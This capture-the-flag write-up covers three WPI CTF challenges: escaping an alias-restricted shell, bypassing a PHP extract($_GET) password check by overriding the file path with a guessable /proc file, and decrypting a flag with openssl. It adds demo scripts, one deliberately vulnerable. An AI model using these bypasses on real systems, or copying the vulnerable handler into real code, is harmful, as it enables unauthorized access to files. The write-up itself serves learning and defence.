```console
$ ssh ctf@107.21.60.114
ctf@107.21.60.114's password:
SuckMORE shell v1.0.1. Note: for POSIX support update to v1.1.0
suckmore>alias
alias bash='sh'
alias cat='sleep 1 && vim'
alias cd='cal'
alias cp='grep'
alias dnf=''
alias find='w'
alias less='echo "We are suckMORE, not suckless"'
alias ls='sleep 1'
alias more='echo "SuckMORE shell, v1.0.1, (c) SuckMore Software, a division of WPI Digital Holdings Ltd."'
alias nano='touch'
alias pwd='uname'
alias rm='mv /u/'
alias sh='echo "Why would you ever want to leave suckmore shell?"'
alias sl='ls'
alias vi='touch'
alias vim='touch'
alias which='echo "Not Found"'
suckmore>unalias -a
suckmore>pwd
/
suckmore>echo /home/*
/home/ctf
suckmore>echo /home/ctf/*
/home/ctf/flag
suckmore>tee</home/ctf/flag
WPI{bash_sucks0194342}
```
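The session above works because aliases are a convenience of the current shell, not a sandbox: one builtin drops all of them, and the shell can list directories (pathname expansion) and read files (redirection plus `read`) without ever running an external binary. The script below is an added example, not part of the writeup or the challenge; the directory layout under `$SANDBOX` and the flag string are constructed to stand in for `/home/ctf/flag`, and only POSIX sh builtins are used.

```shell
#!/bin/sh
# Added example (not from the writeup): an "alias-restricted" shell gives no
# isolation. $SANDBOX and its flag file are constructed stand-ins.
SANDBOX="${TMPDIR:-/tmp}/suckmore_demo.$$"
mkdir -p "$SANDBOX/home/ctf"
printf '%s\n' 'FLAG{constructed_sample}' > "$SANDBOX/home/ctf/flag"
trap 'rm -rf "$SANDBOX"' EXIT

# A few of the aliases the challenge shell used to hide the usual tools.
alias ls='sleep 1'
alias cat='sleep 1 && vim'
alias pwd='uname'

# Aliases exist only in this shell process; `unalias -a` removes every one.
# Returns 0 when the alias table is empty afterwards.
aliases_cleared() {
    unalias -a
    [ -z "$(alias)" ]
}

# Directory listing without ls: the shell expands the glob itself, so the
# listing needs no external program at all (the writeup's `echo /home/ctf/*`).
list_dir_builtin() {
    for entry in "$1"/*; do
        printf '%s\n' "$entry"
    done
}

# File read without cat/less/more: redirection plus the read builtin, which is
# the same trick as `tee</home/ctf/flag` but with no external binary.
read_file_builtin() {
    while IFS= read -r line || [ -n "$line" ]; do
        printf '%s\n' "$line"
    done < "$1"
}

# Stand-alone run: the three steps of the session, builtins only.
aliases_cleared && printf 'no aliases left\n'
list_dir_builtin "$SANDBOX/home/ctf"
read_file_builtin "$SANDBOX/home/ctf/flag"
```

Defensively, the lesson is that anything a user can undo from inside the shell (aliases, functions, `PATH` tweaks) restricts nothing; the restriction has to come from the account's permissions, not from the shell's vocabulary.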
```html
<html>
<head>
<title>WPI CTF</title>
<link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.1.1/css/bootstrap.min.css" integrity="sha384-WskhaSGFgHYWDcbwN70/dfYBj47jz9qbsMId/iRN3ewGhXQFZCSftd1LZCfmhktB" crossorigin="anonymous">
<link href=style.css rel=stylesheet>
</head>
<body>
<div class="form">
<h1>GET a <img src="flag.png" alt="Flag Pic" height="42" width="42">?</h1>
<p> All you gotta do is guess the correct password? </p>
<form action="#" method="GET">
<p><input type="text" name="input"></p>
<p><input class="button" type="submit" value="Enter"></p>
<!-- SGV5IEdvdXRoYW0sIGRvbid0IGZvcmdldCB0byBibG9jayAvYXV0aC5waHAgYWZ0ZXIgeW91IHVwbG9hZCB0aGlzIGNoYWxsZW5nZSA7KQ== -->
</form>
<br>
</div>
</body>
</html>
```
```console
$ printf %s 'SGV5IEdvdXRoYW0sIGRvbid0IGZvcmdldCB0byBibG9jayAvYXV0aC5waHAgYWZ0ZXIgeW91IHVwbG9hZCB0aGlzIGNoYWxsZW5nZSA7KQ==' | base64 -d
Hey Goutham, don't forget to block /auth.php after you upload this challenge ;)
```
```php
<?php
extract($_GET);                    // every GET parameter becomes a variable, $passcode included
if (isset($input)) {               // the hint writes this as "($input is detected)"
    // the hint writes get_contents($passcode); file_get_contents() is assumed here
    if ($input === file_get_contents($passcode)) {
        return $flag;
    } else {
        echo "Invalid ... Please try again!";
    }
}
```
So I did http://getaflag.wpictf.xyz:31337/?input=1&passcode=/proc/sys/net/ipv4/ip_forward.
Why? Because the content of /proc/sys/net/ipv4/ip_forward can only be 1 or 0, so its content is easy to guess and `$input === get_contents($passcode)` is easy to satisfy. Also, `extract($_GET);` converts every GET parameter into a variable, so we are able to override `$passcode`.
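The same variable-override bug, rebuilt in shell as an added example that is not the challenge's auth.php: `auth_vulnerable` turns every `key=value` pair of the query string into a shell variable, which is what `extract($_GET)` does, so the request can replace the server-side `passcode` path with any world-readable file whose content is guessable; `auth_hardened` keeps the path fixed and reads only the one parameter it expects. The flag, the secret, the guessable file and the query strings are all constructed for the demo (no URL decoding is done).

```shell
#!/bin/sh
# Added example, not the challenge's code: extract($_GET) modelled in shell,
# vulnerable handler beside the hardened one. All paths and values constructed.
DEMO="${TMPDIR:-/tmp}/getaflag_demo.$$"
mkdir -p "$DEMO"
printf '%s' 'correct-horse-battery-staple' > "$DEMO/passcode.txt"   # the real secret
printf '%s' '1' > "$DEMO/guessable.txt"   # stands in for /proc/sys/net/ipv4/ip_forward
FLAG='FLAG{constructed_sample}'
trap 'rm -rf "$DEMO"' EXIT

# Print the value of key $2 from query string $1 (empty when absent). Runs in
# a subshell so the IFS change cannot leak; always exits 0.
param_value() (
    IFS='&'
    for pair in $1; do
        case $pair in
            "$2="*) printf '%s' "${pair#"$2="}"; exit 0 ;;
        esac
    done
    exit 0
)

# Vulnerable: the equivalent of extract($_GET). Every pair is assigned as a
# variable AFTER the server-side default, so a passcode= parameter replaces it.
auth_vulnerable() {
    passcode="$DEMO/passcode.txt"
    input=''
    old_ifs=$IFS; IFS='&'
    for pair in $1; do
        key=${pair%%=*}; value=${pair#*=}
        case $key in ''|*[!A-Za-z0-9_]*) continue ;; esac   # identifiers only
        eval "$key=\$value"     # assigns the value verbatim, never re-parses it
    done
    IFS=$old_ifs
    if [ -n "$input" ] && [ "$input" = "$(cat "$passcode")" ]; then
        printf '%s' "$FLAG"
    else
        printf '%s' 'Invalid ... Please try again!'
    fi
}

# Hardened: the passcode path is decided server-side and never taken from the
# request; only the expected parameter is pulled out of the query string.
auth_hardened() {
    passcode="$DEMO/passcode.txt"
    input=$(param_value "$1" input)
    if [ -n "$input" ] && [ "$input" = "$(cat "$passcode")" ]; then
        printf '%s' "$FLAG"
    else
        printf '%s' 'Invalid ... Please try again!'
    fi
}

# Stand-alone run: the override succeeds against the first handler only.
auth_vulnerable "input=1&passcode=$DEMO/guessable.txt"; echo
auth_hardened   "input=1&passcode=$DEMO/guessable.txt"; echo
```

The fix is not to validate the `passcode` parameter but to stop taking it from the request at all: in PHP that means dropping `extract($_GET)` and reading `$_GET['input']` explicitly, and the same goes for any framework feature that mass-assigns request data into application variables.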
Flag was WPI{1_l0v3_PHP} but there was a little troll:
```html
<b>You did it, <a href=https://bit.ly/IqT6zt>click here to get your flag</a></b></p>
<script type='text/javascript'>
console.log('Never trust suspicious links');
console.log('Flag is WPI{1_l0v3_PHP}');
</script>
```
Let's base64 decode the encrypted file and store it in a new file.
```console
$ cat random.txt | base64 -d > random.bin
```
Now let's decipher it:
```console
$ openssl aes-256-cbc -d -in random.bin -out flag.txt -pass file:urandom.txt
*** WARNING : deprecated key derivation used.
Using -iter or -pbkdf2 would be better.
$ cat flag.txt
Being holy in our church means installing a wholly free operating system--GNU/Linux is a good choice--and not putting any non-free software on your computer. Join the Church of Emacs, and you too can be a saint!
And lo, it came to pass, that the neophyte encountered the Beplattered One and humbly posed the question "Oh great master, is it a sin to use vi?"
And St. IGNUcuis dist thus reply unto him, "No, my young hacker friend, it is not a sin. It is a penance."
WPI{@11_Ur_d3v1c3s_r_b3l0ng_2_us}
```
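The warning matters in practice: `openssl enc` without `-pbkdf2` derives the key with the old EVP_BytesToKey scheme, and the decrypting side must use the same derivation as the encrypting side or it ends up with a different key. The script below is an added example, not part of the writeup: it runs the base64-then-`openssl` round trip with `-pbkdf2`, repeats it with the legacy derivation the challenge used, and shows what mixing the two does. The password file stands in for the writeup's `urandom.txt` (`-pass file:` reads the first line of the file), and the plaintext is constructed.

```shell
#!/bin/sh
# Added example, not from the writeup: the same openssl enc workflow with the
# key derivation made explicit. Password file and plaintext are constructed.
WORK="${TMPDIR:-/tmp}/enc_demo.$$"
mkdir -p "$WORK"
printf '%s\n' 'constructed-demo-password' > "$WORK/pass.txt"
printf '%s\n' 'constructed plaintext: must come back byte for byte' > "$WORK/plain.txt"
trap 'rm -rf "$WORK"' EXIT

# Encrypt with PBKDF2 (what the warning recommends), base64-wrap the result as
# in the challenge's random.txt, then reverse both steps. Returns 0 on match.
roundtrip_pbkdf2() {
    openssl enc -aes-256-cbc -pbkdf2 -pass "file:$WORK/pass.txt" \
        -in "$WORK/plain.txt" | base64 > "$WORK/random.txt"
    base64 -d "$WORK/random.txt" > "$WORK/random.bin"
    openssl enc -d -aes-256-cbc -pbkdf2 -pass "file:$WORK/pass.txt" \
        -in "$WORK/random.bin" -out "$WORK/out.txt"
    cmp -s "$WORK/plain.txt" "$WORK/out.txt"
}

# Legacy derivation, the form the writeup used. It still works (with the
# warning on stderr) as long as both sides use it. Returns 0 on match.
roundtrip_legacy() {
    openssl enc -aes-256-cbc -pass "file:$WORK/pass.txt" \
        -in "$WORK/plain.txt" -out "$WORK/legacy.bin" 2>/dev/null
    openssl enc -d -aes-256-cbc -pass "file:$WORK/pass.txt" \
        -in "$WORK/legacy.bin" -out "$WORK/legacy_out.txt" 2>/dev/null
    cmp -s "$WORK/plain.txt" "$WORK/legacy_out.txt"
}

# Mixing derivations: encrypt legacy, decrypt with -pbkdf2. The key differs,
# so openssl normally reports "bad decrypt"; on the rare occasion the garbage
# passes the padding check, the output still is not the plaintext.
# Returns 0 when the plaintext did NOT come back.
kdf_mismatch_detected() {
    openssl enc -aes-256-cbc -pass "file:$WORK/pass.txt" \
        -in "$WORK/plain.txt" -out "$WORK/legacy.bin" 2>/dev/null
    if openssl enc -d -aes-256-cbc -pbkdf2 -pass "file:$WORK/pass.txt" \
        -in "$WORK/legacy.bin" -out "$WORK/mismatch.txt" 2>/dev/null; then
        ! cmp -s "$WORK/plain.txt" "$WORK/mismatch.txt"
    else
        return 0
    fi
}

# Stand-alone run.
roundtrip_pbkdf2      && echo 'pbkdf2 round trip ok'
roundtrip_legacy      && echo 'legacy round trip ok'
kdf_mismatch_detected && echo 'mismatched derivation does not decrypt'
```

When a CTF or a real decryption fails with "bad decrypt", a mismatched derivation (`-pbkdf2`/`-iter` on one side only, or a different `-md`) is the first thing to check before assuming the password is wrong.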